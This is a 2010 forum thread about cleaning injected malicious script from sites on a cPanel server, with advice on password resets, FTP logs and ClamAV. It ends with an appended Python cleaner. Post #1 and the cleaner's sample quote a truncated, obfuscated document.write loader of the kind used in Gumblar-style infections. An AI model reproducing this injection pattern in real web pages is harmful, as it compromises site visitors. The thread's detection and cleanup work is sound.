Infected index.xxx files on my server

Discussion in 'Security' started by samuelmf, Jan 25, 2010.

  1. samuelmf

    samuelmf Member

    Hi, I have many sites on my server with Redhat ES 3 and cPanel 11.24.5-S38506 - WHM 11.24.2 - X 3.9

    Many sites have code like:
    <script>/*Exception*/ document.write('<script src='+'h@$(@t!t^p!&:#^@/^!)^/!p^l#!@a@&$$) ...... \$/ig, '')+' defer=defer></scr'+'ipt>');</script><!--9f5661a0f751133b5d2ccace4a586aaa-->

    It's similar to Gumblar, but this doesn't create an iframe.

    How could I secure my sites and remove this trojan without removing my site, my databases and other things?

    Thanks in advance!
     
    #1 samuelmf, Jan 25, 2010
    Last edited: Jan 25, 2010
  2. thewebhosting

    thewebhosting Active Member

    You will have to manually remove the malicious script from all your files and reset the passwords of all your accounts, including cPanel, FTP, etc. Before doing that, check the FTP logs to see from which IP address the malicious script was uploaded or the files were modified, and block that IP address on your server.
     
  3. samuelmf

    samuelmf Member

    Could I install the Anti-Gumblar script on my server?
     
  4. emindstech

    emindstech New Member

    Anti Gumblar won't help

    Hello,

    Installation of Anti Gumblar won't help that much.

    We would suggest that you download all your pages related to site content to a local machine, scan them, and re-upload them. Make sure to change the FTP password to one that is complex and confidential, and then re-upload all your site-related content. It would be more helpful to you.

    You can get help from a developer to remove the script that infected the main page or the respective pages.

    Regards,
    Eminds Tech - Kapil
     
  5. samuelmf

    samuelmf Member

    Some specific antivirus software to remove the virus locally?
     
  6. cPanelDon

    cPanelDon cPanel Quality Assurance Analyst
    Staff Member

    For server-side usage I recommend ClamAV; it is free and readily available. For a Linux RPM-based OS like CentOS or RHEL I recommend first ensuring that there are no conflicting ClamAV software packages (RPMs) installed, and then proceeding to compile ClamAV from source by installing the ClamAV Connector plug-in via WHM:
    WHM: Main >> cPanel >> Manage Plugins >> clamavconnector

    To check for conflicting ClamAV software packages the following command may be used:
    Code:
    # rpm -qa | grep -i clam
    To remove a conflicting RPM, simply use "rpm -e" followed by the package name.

    Once ClamAV is installed I recommend reviewing usage information in the provided manual "man" documentation using the following command via root SSH access:
    Code:
    # man clamscan
    For home or other non-server use (e.g., if scanning files on a local workstation) I personally prefer Kaspersky Anti-Virus; it is a commercially-licensed (paid) product, but there is a free trial period where the software could be tested to see if it meets your specific needs or requirements.

    Reference web site and vendor forums: Kaspersky Lab & Kaspersky Lab Forum
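
Added example, not part of any post in this thread: a Python sketch of the "find and remove the injected script from all files" step, using a signature built only from the one snippet quoted in post #1. The extension list, the quarantine directory argument and the shortened sample payload are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# Signature modelled on the snippet in post #1: a <script> block opening with
# /*Exception*/ document.write( and followed by a 32-hex-digit HTML comment.
# The tempered dot keeps a match from running past the first real </script>.
INJECTION = re.compile(
    rb"<script>\s*/\*Exception\*/\s*document\.write\("
    rb"(?:(?!</script>).)*</script>\s*<!--[0-9a-f]{32}-->",
    re.DOTALL | re.IGNORECASE,
)
# Assumed set of web file types worth checking; extend it for your sites.
EXTENSIONS = {".html", ".htm", ".php", ".js", ".tpl", ".shtml"}


def clean(data: bytes):
    """Return (data with every injected block removed, number of blocks removed)."""
    return INJECTION.subn(b"", data)


def scan_tree(root, quarantine=None):
    """Yield (path, hits) per infected file; clean in place if quarantine is given."""
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        data = path.read_bytes()
        cleaned, hits = clean(data)
        if hits and quarantine:
            # Keep the infected original outside the web root, then overwrite.
            copy = Path(quarantine) / path.relative_to(root)
            copy.parent.mkdir(parents=True, exist_ok=True)
            copy.write_bytes(data)
            path.write_bytes(cleaned)
        if hits:
            yield path, hits


# Constructed sample: a page with the block appended (payload shortened, inert).
SAMPLE = (
    b"<html><body><h1>Home</h1><script>var a = 1;</script></body></html>\n"
    b"<script>/*Exception*/ document.write('<script src='+'h@t!t^p'.replace(/x/ig, '')"
    b"+' defer=defer></scr'+'ipt>');</script><!--0123456789abcdef0123456789abcdef-->"
)

if __name__ == "__main__":
    root, quarantine = (sys.argv[1:] + [None, None])[:2]
    for path, hits in scan_tree(root or ".", quarantine):
        print(f"{path}: {hits} injected block(s)")
```

Run it with only a document root to get a report; pass a second directory outside the web root to save the infected originals there and clean the files in place. Files it does not flag can still be infected by a variant, so it complements the ClamAV scan and password resets rather than replacing them.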
     